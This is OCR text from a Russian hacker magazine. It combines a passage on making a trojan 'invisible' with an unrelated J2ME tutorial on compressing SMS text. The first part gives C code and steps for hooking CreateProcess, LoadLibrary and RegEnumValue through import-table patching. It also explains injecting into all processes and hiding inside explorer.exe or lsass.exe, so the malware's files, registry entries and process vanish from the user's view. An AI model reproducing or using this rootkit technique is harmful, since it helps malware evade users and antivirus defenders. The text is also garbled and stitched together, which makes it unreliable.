книги хакеры / журнал хакер / 075_Optimized

Николай "GorluM" Андреев (gorlum@real.xakep.ru)

íåâè ä è

ì ê

à

дает записи в реестре, висит в списке процессов, лежит в системной директории, в общем, делает все возможное, чтобы пользователь ее обнаружил и сдал в соответствующие инстанции. Стоит только юзеру зайти с помощью regedit.exe в ключ Run в реестре, так он сразу обнаружит автоматически загружаемого зверя. Ты можешь сказать, что кроме Run в форточках есть еще масса мест, где смог бы спрятаться троян, при этом раз за разом загружаясь при старте системы, и ты будешь абсолютно прав, но юзер может обо всех этих местах знать. А если он пользуется специальными утилитами, то даже это от него не потребуется - юзер просто нажмет кнопку, и перед ним высветятся все загружаемые вместе с виндой программы. Пара щелчков мышью, и все - троян сдох или, что хуже, отправлен на опыты антивирусникам. А ведь запись в реестре - это лишь

один, не самый значительный след, который может оставить программа.

Что будет, если пользователь захочет заглянуть в system32 и посмотреть последние созданные файлы? Все, минуты трояна на этом компьютере сочтены. Печально, но факт: юзер просто удалит непонятный экзешник, и никто ему не помешает этого сделать, а если файл залочен - зайдет в safe mode и грохнет его оттуда.

Чтобы этого не произошло, чтобы программа оставалась жить в компьютере как можно дольше, хакеры придумали технологию невидимости. Под невидимостью в данном случае подразумевается то, что все следы пребывания программы на компьютере ею же и подметутся. Записи в реестре, в файловой системе, в списке процессов будут аккуратно ликвидированы.

Все это звучит страшно, а реализуется элементарно: с помощью уже хорошо известных нам с тобой технологий, одна из которых - перехват API.

API отвечает за создание списков файлов, записей реестра и тому подобного. Достаточно перехватить возвращаемые функциями Windows данные и вычеркнуть оттуда нашу программу. Идея простая, остается суметь ее воплотить.

ПЕРЕХВАТ - ЭТО ПРОСТО

О перехвате уже не раз писали и в нашем журнале, и в замечательных книгах, и интернете. Но я все же скажу о нем пару слов. По сути дела, перехват API - это замена некоторой чужой функции в какой-нибудь запущенной программе на свою. Осуществляется это кучей способов, но в нашем деле возможно применение только двух из них. Первый способ - непосредственная модификация оригинального кода перехватываемой функции. При этом в ее начало поверх старого кода вставляется инструкция безусловного перехода (jmp) прямо к нашей функции-обработчику, которая, в свою оче- редь, должна восстановить поврежденный код, запустить старую функцию и как-то модифицировать выходные данные. Способ хороший, потому что модифицировать надо только одно место в программе, подверженной перехвату (в отличие от второго способа), но он достаточно сложен в реализации - это раз. Любая примитивная защита, счи- тающая контрольную сумму кода, запалит подобный метод - это два.

Поэтому перейдем ко второму способу - модификации таблицы импорта. Все имена функций, импортируемых программой API, находятся в таблице импорта. После запуска

ПРОГРАММА-НЕВИДИМКА

ret = AdjustTokenPrivileges(hToken, false, &tp, sizeof(tp), NULL, NULL);

if (!ret) return FALSE; CloseHandle(hToken); return TRUE;

}

Но, так как мы не воспользовались хуком для внедрения кода, нам придется самим позаботиться о всех процессах, созданных уже после глобального инжектирования. Самым разумным было перехватить функции CreateProcessA и CreateProcessW (ANSI- и Unicode-вер- сии), чтобы получить данные о свежесозданном процессе и инжектировать в него свой код. Для этого напишем функциюперехватчик примерно вот так:

BOOL WINAPI xCreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)

{

BOOL ret = CreateProcessA(lpApplicationName, lpCommandLine, lpProcessAttributes,lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);

BOOL b = InjectAndRun( FStealth,

lpProcessInformation->dwProcessId); return ret;

}

Как видишь, она объявляется абсолютно так же, как и оригинал, сама запускает перехватываемую функцию, получает pid процесса, инжектирует в него свой код и возвращает результат вызвавшей ее программе. Вначале для перехвата API методом модификации таблицы импорта я использовал функцию Рихтера, но чем больше разбирался с проблемой, тем больше ее модифицировал - в итоге осталось одно название и смысл:

ReplaceIATEntryInAllMods("kernel32.dll", GetProcAddress( GetModuleHandle("kernel32.dll"), "CreateProcessA"), (PROC)xCreateProcessA);

Функция перечислит все модули для текущего процесса и в каждом поправит таблицу импорта, заменив адрес функции CreateProcessA на наш обработчик (запускать эту функцию надо из уже внедренного кода), после чего все создающиеся процессы будут перехватываться. Таким же образом нам надо перехватить и обработать функции CreateProcessW (то есть уни- код-версию) и все семейство LoadLibrary, на случай если какой-нибудь процесс захочет в процессе работы подгрузить к себе библиотеку. Простой пример: при включении готовой невидимки без перехвата загрузки DLL файл программы легко обнаружить - нужно будет всего лишь загрузить Internet Explorer, а затем зайти им не на сайт, а в системную директорию, при этом shell32, работающий с файлами, подгрузится, но не будет перехвачен.

имя файла совпало с FILENAME, другой файл. Стоит внедрить такие функции во все процессы и модифицировать соответствующим образом таблицу импорта, как сразу все приложения (вроде far'а или explorer'а) забывают о существовании твоей программы.

СКРЫВАЕМ ЗАПИСЬ В РЕЕСТРЕ

Для перечисления всех ключей в реестре служит функция RegEnumValue(A\W). Поэтому, если мы хотим, чтобы о клю- чах, созданных нашей программой, система забыла, нужно эту функцию перехватить и немного подкорректировать ее вывод. Пусть, скажем, если имя возвращаемого ключа равно имени нашего файла, этот ключ выводиться не будет, а функция вернет ошибку. Нет проблем, реализуется легко.

LONG WINAPI xRegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName, LPDWORD lpcValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)

{

LONG ret = RegEnumValueA(hKey, dwIndex, lpValueName, lpcValueName, lpReserved, lpType, lpData, lpcbData);

if (lstrcmpiA(lpValueName,FILENAME) == 0) return 1; return ret;

}

Вот и вся функция! Сравниваем lpValueName (имя ключа) с нашей константой и, если они равны, возвращаем единицу. Подобным образом перехватывается и уникод-версия функции (только процедура проверки равенства строк немного иная), после чего система напрочь забудет о записях в реестре с именем нашей программы. Красота!

ЧТО ОСТАЛОСЬ?

Осталась запись в списке процессов. Она легко ликвидируется инжекцией всего управляемого кода в explorer.exe или lsass.exe, где он не будет вызывать ничьего лишнего подозрения. После того как мы скрыли процесс, файл и запись в реестре, никакой, даже очень продвинутый пользователь не обнаружит нашей программы у себя на компьютере. Хотя и энергии мы на это потратили немало: исходный код невидимки весит аж 20 Кб и включает в себя функции повышения привилегий до уровня отладчика, функции инжектирования, перехвата API, перечисления модулей и процессов, функции для работы с таблицей импорта (потому что я отказался от imahehlp.dll), а также 12 функций-об- работчиков. Все это добро ты, как обычно, обнаружишь на диске. Если возникли вопросы или какие-нибудь необыкновенно интересные идеи - пиши, с удовольствием отвечу.

На этом радостной ноте я закругляюсь. Удачного компилирования и изучения недр системы! z

DE

J2ME

Мобильная

архивàöèÿ

Множество полезной информации по J2ME на русском языке ты можешь найти по адресу: http://lib.juga.ru/.

КОДИРОВАНИЕ ТЕКСТА

це на позициях 32-41. Цифры от 0 до 9 логич- но будет поместить тоже в начало нашей таблицы и присвоить им коды от 0 до 9. Теперь коды от 0 до 9 соответствуют трем символам: кириллическому, латинскому и числовому. Как же определить, какой конкретно символ из трех выбрать? Для этого мы будем использовать символы-модификаторы. В основной таблице у нас осталось 22 пустых ячейки. В часть из них мы и поместим модификаторы. Нам потребуются следующие модификаторы: переключатель «кириллица/латиница», переключатель «цифры/не цифры», переключа- тель «заглавные/строчные» и переключатель «следующая заглавная».

Для того чтобы понять, как работают модификаторы, закодируем такое сообщение: «Привет, Lexa, мой НОМЕР 128. Пока» - и посмотрим, что выйдет.

[следующая заглавная]привет, [кириллица/латиница][следующая заглавная]lexa, [кириллица/латиница]мой [заглавные/строчные]номер [цифры/не цифры]128. [цифры/не цифры]п[заглавные/строчные]ока

Аналогия с клавишей Shift налицо. Первое упоминание модификатора - это нажатие клавиши, второе упоминание - это ее отпускание. На на- чальном этапе модификаторы установлены в положение «строчные кириллические буквы». Из общего ряда выделяется модификатор «следующая заглавная», он не требует отклю- чения. Преимущество использования его, а не модификатора «строчные/заглавные» оче- видно и равно шести битам.

В Unicode такое сообщение занимало бы 33*2 = 66 байт. В нашей кодировке оно занимает 41*6/8 = 31 байт. Здорово, сжали сообщение больше чем в два раза, но мы не будем останавливаться на достигнутом. Мы задействовали только 46 кодов, и у нас в запасе еще 18. Эти 18 кодов позволяют нам использовать для трех символов не шестибитное, а четырехбитное кодирование. На рисунке показано, за счет чего осуществляется переход к четырем битам и почему таких символов может быть только три.

Каким же символам присвоить такие короткие коды? Ответ очевиден: наиболее часто встречающимся в текстах на русском языке - пробелу (о котором, кстати, мы вообще забыли) и буквам «о» и «е».

Проведя несколько экспериментов, легко увидеть, насколько большой выигрыш мы получим за счет использования всего лишь трех четырехбитных кодов.

ПОДГОТОВКА

Чтобы осуществить подобное кодирование сообщений у себя на телефоне, тебе потребуется немного разобраться в программировании на J2ME. Этот язык поддерживают большинство современных моделей. А для того чтобы в нем разобраться, необходим

Потеря бит при переходе к четырехбитному кодированию

софт: компилятор, среда и эмулятор. Компилятор сделает из текста программы готовый мидлет, среда нужна для того, чтобы не париться и не изучать разные ключи компилятора, а также чтобы не искать текстовый редактор. Эмулятор же нужен для тестирования и запуска полученного в результате компиляции приложения.

Смело устанавливай с диска J2SE, а затем и Java 2 Micro Edition Wireless Toolkit (WTK), с помощью которого обычно и пишется софт для мобильников. WTK - это как раз набор всего необходимого для нашего случая. В нем даже универсальный эмулятор есть, поддерживающий все современные навороты. Подобный эмулятор позволит проверить работоспособность программы вообще, но не программы на конкретной модели мобилы. Если хочешь быть уверен в работе твоего мидлета на определенном телефоне - скачай специфический, родной, эмулятор с сайта производителя сотового. Альтернативой родному эмулятору может служить только сам телефон, на который ты будешь постоянно заливать новые версии, что, надо признать, не всегда возможно. Кстати, чуть не забыл, - нам потребуется софт для загрузки мидлета в телефон. Его обычно можно найти либо на диске, который прилагался к телефону, либо там же, где и эмулятор, - на сайте производителя.

К сожалению, не все можно протестировать на эмуляторе, особенно если это универсальный эмулятор. Поэтому пользоваться телефоном для тестирования придется. В реальной мобиле некоторые вещи могут работать немного иначе. Мне, например, так и не удалось осуществить отправку SMS с одного эмулятора на другой. Зато отправка сообщения с эмулятор на обычный телефон прошла на ура. Правда, последующие двое суток я полу- чал эту СМСку на свой телефон каждый час. Видимо, на шлюзе, через который происходила отправка, случился сбой :).

ПОПЫТКИ РЕАЛИЗАЦИИ

Вооружившись всем необходимым для программирования и тестирования софтом, наконец, можно попробовать осуществить нашу идею. Для этого заходим в директорию с WTK

èиз поддиректории bin запускаем ktoolbar.exe. В появившемся окне выбираем пункт «New Project» и создаем новый проект, sms_test, с таким же названием класса. В следующем окошке, не читая, кликаем «Ok». Настройки на данной стадии нас совершенно не интересуют. Проект создан, теперь можешь приступать к написанию мидлета. Исходники твоей программки будут храниться в директории apps/sms_test/src. Полный код уже готового мидлета для изучения ты можешь найти на диске, здесь же я рассмотрю только некоторые вопросы.

Итак, цикл разработки приложения для твоей мобилы состоит из двух фаз:

1 Написание кода мидлета, его компиляция

èотладка на эмуляторе.

2 Загрузка мидлета в телефон и тестирование его на телефоне.

Для того чтобы отправить СМС из своей программы, нужно использовать Wireless Messaging API. Набор очень удобных и понятных классов: MessageConnection - определяет операции для посылки и получения сообщений. MessageListener - позволяет мидлету полу- чать уведомления о входящих сообщениях.

Играй

просто!

GamePost